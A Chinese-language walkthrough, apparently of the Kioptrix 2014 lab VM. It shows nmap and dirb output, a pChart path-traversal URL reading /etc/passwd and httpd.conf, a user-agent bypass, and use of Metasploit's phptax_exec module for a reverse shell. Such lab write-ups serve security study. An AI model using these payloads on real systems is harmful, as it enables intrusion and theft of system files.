kiop2014

靶机IP：192.168.1.159
kaliIP：192.168.1.128
先用nmap看看情况

sudo nmap --min-rate 10000 -p- 192.168.1.159
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-13 13:50 CST
Nmap scan report for bogon (192.168.1.159)
Host is up (0.00023s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE  SERVICE
22/tcp   closed ssh
80/tcp   open   http
8080/tcp open   http-proxy

再看看详细情况

 sudo nmap -A -p22,80,8080 192.168.1.159
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-13 13:52 CST
Nmap scan report for bogon (192.168.1.159)
Host is up (0.00043s latency).

PORT     STATE  SERVICE VERSION
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
MAC Address: 00:0C:29:FD:5C:9F (VMware)
Device type: firewall|general purpose|VoIP adapter|VoIP phone
Running (JUST GUESSING): Fortinet embedded (89%), OpenBSD 4.X|5.X (88%), Vonage embedded (88%), FreeBSD 10.X (86%), Polycom embedded (86%)
OS CPE: cpe:/o:openbsd:openbsd:4.0 cpe:/h:vonage:v-portal cpe:/o:freebsd:freebsd:10.3 cpe:/o:openbsd:openbsd:5.9 cpe:/h:polycom:soundpoint_ip_331
Aggressive OS guesses: Fortinet FortiGate-50B or 310B firewall (89%), OpenBSD 4.0 (88%), Vonage V-Portal VoIP adapter (88%), Fortinet FortiGate 100D firewall (86%), Fortinet FortiGate 1500D firewall (86%), FreeBSD 10.3-RELEASE (86%), OpenBSD 5.9 (86%), Polycom SoundPoint IP 331 VoIP phone (86%), Fortinet FortiGate-60B or -100A firewall (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.43 ms bogon (192.168.1.159)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.31 seconds

访问端口看看，80允许访问，8080无权限，web架构和nmap扫描结果相同

看目录

sudo dirb http://192.168.1.159         
+ http://192.168.1.159/cgi-bin/ (CODE:403|SIZE:210)                   
+ http://192.168.1.159/index.html (CODE:200|SIZE:152）  

cgi-bin的目录也需要权限，看网页源代码发现关键词

<!--
  <META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php">
  -->

查询pChart2.1.3发现有文件包含，拼接后发现成功

http://localhost/pChart2.1.3/examples/index.php/?Action=View&Script=/../../../etc/passwd
查看apache服务器的配置
In FreeBSD, the main Apache HTTP Server configuration file is installed as /usr/local/etc/apache2 x /httpd.conf, where x represents the version number. Thisl ASCII text file begins comment lines with a # . The most frequently modified directives are: ServerRoot "/usr/local"
在FreeBSD中，主要的Apache HTTP服务器配置文件安装为/usr/local/etc/apache2 x /httpd.conf，其中x代表版本号。这个ASCII文本文件的注释行以#开始。最常被修改的指令是:ServerRoot "/usr/local"

http://localhost/pChart2.1.3/examples/index.php/?Action=View&Script=/../../../usr/local/etc/apache22/httpd.conf
<VirtualHost *:8080>
    DocumentRoot /usr/local/www/apache22/data2

<Directory "/usr/local/www/apache22/data2">
    Options Indexes FollowSymLinks
    AllowOverride All
    Order allow,deny
    Allow from env=Mozilla4_browser
</Directory>

发现8080端口限制user-agent，使用火狐扩展User-Agent Switcher工具持续修改，
访问
http://localhost：8080
发现新的文件夹，点击为一张图片，搜索一下相关信息
http://localhost/phptax/
可以用msf打，搜索一下，模块为multi/http/phptax_exec
设置好后直接run，反向连接到主机。